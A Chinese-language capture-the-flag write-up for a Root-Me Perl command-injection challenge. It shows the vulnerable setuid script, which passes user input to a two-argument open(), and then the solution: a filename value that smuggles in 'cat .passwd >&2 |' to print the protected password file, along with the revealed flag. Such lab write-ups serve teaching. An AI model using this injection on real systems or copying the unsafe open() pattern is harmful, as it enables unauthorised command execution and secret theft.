客服电话
APP下载
迪恩网络APP
随时随地掌握行业动态
官方微信
扫描二维码
关注迪恩网络微信公众号
|
LINK:https://www.root-me.org/en/Challenges/App-Script/Perl-Command-injection Referrence:http://www.cnblogs.com/chengmo/archive/2010/10/20/1855805.html https://www.cnblogs.com/softidea/p/3965093.html https://github.com/Vinnyz/Root-me-challenge-App-Script http://repository.root-me.org/Programmation/Perl/EN%20-%20Perl%20operators.pdf SOURCE CODE: #!/usr/bin/perl delete @ENV{qw(IFS CDPATH ENV BASH_ENV)}; $ENV{'PATH'}='/bin:/usr/bin'; use strict; use warnings; main(); sub main { my ($file, $line) = @_; menu(); prompt(); while((my $file = <STDIN>)) { chomp $file; process_file($file); prompt(); } } sub prompt { local $| = 1; print ">>> "; } sub menu { print "*************************\n"; print "* Stat File Service *\n"; print "*************************\n"; } sub check_read_access { my $f = shift; if(-f $f) { my $filemode = (stat($f))[2]; return ($filemode & 4); } return 0; } sub process_file { my $file = shift; my $line; my ($line_count, $char_count, $word_count) = (0,0,0); $file =~ /(.+)/; $file = $1; if(!open(F, $file)) { die "[-] Can't open $file: $!\n"; } while(($line = <F>)) { $line_count++; $char_count += length $line; $word_count += scalar(split/\W+/, $line); } print "~~~ Statistics for \"$file\" ~~~\n"; print "Lines: $line_count\n"; print "Words: $word_count\n"; print "Chars: $char_count\n"; close F; } Solution: app-script-ch7@challenge02:~$ ./setuid-wrapper ************************* * Stat File Service * ************************* >>> ch7.pl ~~~ Statistics for "ch7.pl" ~~~ Lines: 73 Words: 164 Chars: 1186 >>> cat .passwd >&2 | PerlCanDoBetterThanYouThink ~~~ Statistics for "cat .passwd >&2 |" ~~~ Lines: 0 Words: 0 Chars: 0 &2等同于1>&2命令,表示将shell命令执行得到的正确结果作为错误信息输出到终端,将cat .passwd这个命令的结果作为文件名传入会返回错误结果,这样就会将.passwd的文件内容替换"Can't open cat .passwd: No such file or directory"这条错误信息打印出来得到本题答案。 |
请发表评论